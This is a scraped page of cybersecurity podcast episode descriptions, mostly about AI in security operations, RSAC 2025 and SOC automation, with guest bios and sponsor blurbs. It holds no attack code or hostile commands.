The RSA Conference has long served as a meeting point for innovation and collaboration in cybersecurity—and in this pre-RSAC episode, ITSPmagazine co-founders Marco Ciappelli and Sean Martin welcome Akamai's Rupesh Chokshi to the conversation. With RSAC 2025 on the horizon, they discuss Akamai's presence at the event and dig into the challenges and opportunities surrounding AI, threat intelligence, and enterprise security.Chokshi, who leads Akamai's Application Security business, describes a landscape marked by explosive growth in web and API attacks—and a parallel shift as enterprises embrace generative AI. The double-edged nature of AI is central to the discussion: while it offers breakthrough productivity and automation, it also creates new vulnerabilities. Akamai's dual focus, says Chokshi, is both using AI to strengthen defenses and securing AI-powered applications themselves.The conversation touches on the scale and sophistication of modern threats, including an eye-opening stat: Akamai is now tracking over 500 million large language model (LLM)-driven scraping requests per day. As these threats extend from e-commerce to healthcare and beyond, Chokshi emphasizes the need for layered defense strategies and real-time adaptability.Ciappelli brings a sociological lens to the AI discussion, noting the hype-to-reality shift the industry is experiencing. “We're no longer asking if AI will change the game,” he suggests. “We're asking how to implement it responsibly—and how to protect it.”At RSAC 2025, Akamai will showcase a range of innovations, including updates to its Guardicore platform and new App & API Protection Hybrid solutions. Their booth (6245) will feature interactive demos, theater sessions, and one-on-one briefings. The Akamai team will also release a new edition of their State of the Internet report, packed with actionable threat data and insights.The episode closes with a reminder: in a world that's both accelerating and fragmenting, cybersecurity must serve not just as a barrier—but as a catalyst. “Security,” says Chokshi, “has to enable innovation, not hinder it.”⸻Keywords: RSAC 2025, Akamai, cybersecurity, generative AI, API protection, web attacks, application security, LLM scraping, Guardicore, State of the Internet report, Zero Trust, hybrid digital world, enterprise resilience, AI security, threat intelligence, prompt injection, data privacy, RSA Conference, Sean Martin, Marco Ciappelli______________________Guest: Rupesh Chokshi, SVP & GM, Akamai https://www.linkedin.com/in/rupeshchokshi/Hosts:Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber] | On ITSPmagazine: https://www.itspmagazine.com/sean-martinMarco Ciappelli, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining Society Podcast & Audio Signals Podcast | On ITSPmagazine: https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/marco-ciappelli____________________________This Episode's SponsorsAKAMAI:https://itspm.ag/akamailbwc____________________________ResourcesLearn more and catch more stories from RSA Conference 2025 coverage: https://www.itspmagazine.com/rsa-conference-usa-2025-rsac-san-francisco-usa-cybersecurity-event-infosec-conference-coverageRupesh Chokshi Session at RSAC 2025The New Attack Frontier: Research Shows Apps & APIs Are the Targets - [PART1-W09]____________________________Catch all of our event coverage: https://www.itspmagazine.com/technology-and-cybersecurity-conference-coverageTo see and hear more Redefining CyberSecurity content on ITSPmagazine, visit: https://www.itspmagazine.com/redefining-cybersecurity-podcastTo see and hear more Redefining Society stories on ITSPmagazine, visit:https://www.itspmagazine.com/redefining-society-podcastWant to tell your Brand Story Briefing as part of our event coverage? Learn More
In this episode of Detection at Scale, Matthew Martin, Founder of Two Candlesticks, shares practical approaches for implementing AI in security operations, particularly for smaller companies and those in emerging markets. Matthew explains how AI chatbots can save analysts up to 45 minutes per incident by automating initial information gathering and ticket creation. Matthew's conversation with Jack explores critical implementation challenges, from organizational politics to data quality issues, and the importance of making AI decisions auditable and explainable. Matthew emphasizes the essential balance between AI capabilities and human intuition, noting that although AI excels at analyzing data, it lacks understanding of intent. He concludes with valuable advice for security leaders on business alignment, embracing new technologies, and maintaining human connection to prevent burnout. Topics discussed: Implementing AI chatbots in security operations can save analysts approximately 45 minutes per incident through automated information gathering and ticket creation. Political challenges within organizations, particularly around AI ownership and budget allocation, often exceed technical challenges in implementation. Data quality and understanding are foundational requirements before implementing AI in security operations to ensure effective and reliable results. The balance between human intuition and AI capabilities is crucial, as AI excels at data analysis but lacks understanding of intent behind actions. Security teams should prioritize making AI decisions auditable and explainable to ensure transparency and accountability in automated processes. Generative AI lowers barriers for both attackers and defenders, requiring security teams to understand AI capabilities and limitations. In-house data processing and modeling are preferable for sensitive customer data, with clear governance frameworks for privacy and security. Future security operations will likely automate many Tier 1 and Tier 2 functions, allowing analysts to focus on more complex issues. Security leaders must understand their business thoroughly to build controls that align with how the company generates revenue. Technology alone cannot solve burnout issues; leaders must understand their people at a human level to create sustainable efficiency improvements.
In a conversation that sets the tone for this year's RSA Conference, Steve Wilson, shares a candid look at how AI is intersecting with cybersecurity in real and measurable ways. Wilson, who also leads the OWASP Top 10 for Large Language Models project and recently authored a book published by O'Reilly on the topic, brings a multi-layered perspective to a discussion that blends strategy, technology, and organizational behavior.Wilson's session title at RSA Conference—“Are the Machines Learning, or Are We?”—asks a timely question. Security teams are inundated with data, but without meaningful visibility—defined not just as seeing, but understanding and acting on what you see—confidence in defense capabilities may be misplaced. Wilson references a study conducted with IDC that highlights this very disconnect: organizations feel secure, yet admit they can't see enough of their environment to justify that confidence.This episode tackles one of the core paradoxes of AI in cybersecurity: it offers the promise of enhanced detection, speed, and insight, but only if applied thoughtfully. Generative AI and large language models (LLMs) aren't magical fixes, and they struggle with large datasets. But when layered atop refined systems like user and entity behavior analytics (UEBA), they can help junior analysts punch above their weight—or even automate early-stage investigations.Wilson doesn't stop at the tools. He zooms out to the business implications, where visibility, talent shortages, and tech complexity converge. He challenges security leaders to rethink what visibility truly means and to recognize the mounting noise problem. The industry is chasing 40% more CVEs year over year—an unsustainable growth curve that demands better signal-to-noise filtering.At its heart, the episode raises important strategic questions: Are businesses merely offloading thinking to machines? Or are they learning how to apply these technologies to think more clearly, act more decisively, and structure teams differently?Whether you're building a SOC strategy, rethinking tooling, or just navigating the AI hype cycle, this conversation with Steve Wilson offers grounded insights with real implications for today—and tomorrow.
All links and images for this episode can be found on CISO Series. This week's episode is hosted by me, David Spark, producer of CISO Series and Christina Shannon, CIO, KIK Consumer Products. Joining them is Jim Bowie, CISO, Tampa General Hospital. In this episode: A journey, not a destination The difference between pressure and stress Fighting commodity deepfakes Getting leadership on the same page HUGE thanks to our sponsors, Proofpoint, Cofense, & KnowBe4 With an integrated suite of cloud-based cybersecurity and compliance solutions, Proofpoint helps organizations around the world stop targeted threats, safeguard their data, and make their users more resilient against cyber attacks. Discover cutting-edge security insights and industry trends from leading experts at Proofpoint Power Series—a monthly virtual event designed to empower the security community. Learn more at proofpoint.com Powered by 35 million trained employee reporters, the exclusive Cofense® PhishMe® Email Security Awareness Training with Risk Validation and Phishing Threat Detection and Response Platforms combine robust training with advanced tools for phishing identification and remediation. Together, our solutions empower organizations to identify, combat, and eliminate phishing threats in real-time. Learn more at cofense.com KnowBe4's PhishER Plus is a lightweight SOAR platform that streamlines threat response for high-volume, potentially malicious emails reported by users. It automatically prioritizes messages, helping InfoSec and Security Operations teams quickly address the most critical threats, reducing inbox clutter and enhancing overall security efficiency. Learn more at knowbe4.com
➡ Build, run, and monitor workflows with Tines at: tines.com In this episode, I speak with Matt Muller, Field CSCO at Tines, about how automation and AI are transforming security operations at scale. We talk about: • Tines' Mission to Eliminate Manual Security Work Through Automation How Tines helps security teams streamline incident response and workflow automation without needing to write code, saving time and reducing burnout. • Applying AI to Security Operations and Analyst Workflows How AI is used in phishing analysis, threat intel reporting, and data transformation—integrated safely into workflows using tools like Workbench with private LLMs. • Tines Workbench and the Future of Agentic AI How Workbench combines chat with deterministic automation to help analysts take action securely, and how Tines is exploring agentic AI to take automation even further. Chapters: 00:00 - How Tines Automates Security to Solve SOC Burnout07:19 - The AI Arms Race: How Attackers and Defenders Are Evolving09:08 - Why Security Still Comes Down to Workflow, Logging, and Action13:41 - How CISOs Are Balancing AI Adoption and Enterprise Risk17:36 - Using AI in Tines to Transform and Automate Security Workflows20:40 - How AI Detects Business Email Compromise Better Than Rules25:26 - From Security to Data Pipelines: Tines as Workflow Orchestration28:59 - Inside Workbench: Secure AI-Powered Chat for Analysts36:00 - Automating Phishing Investigations with Trusted Tool Integrations39:19 - Where to Learn More and Try Tines for FreeBecome a Member: https://danielmiessler.com/upgradeSee omnystudio.com/listener for privacy information.
This episode is a recording of a live interview held on stage at Blu Ventures' Cyber Venture Forum in February. A huge shoutout and thank you to the Blu Ventures team for putting together an awesome event. Bricklayer is building an AI-based agent to assist with security operations workflows. Before Bricklayer, Adam founded ThreatConnect which he led for over a decade. In the conversation we discuss his learnings from his experience at ThreatConnect, acquiring vs. building a new capability, and how he thinks about competition in the AI SOC space.Website: bricklayer.aiSponsor: VulnCheck
© 2020-2025 Ivy Podcast Discovery LLC
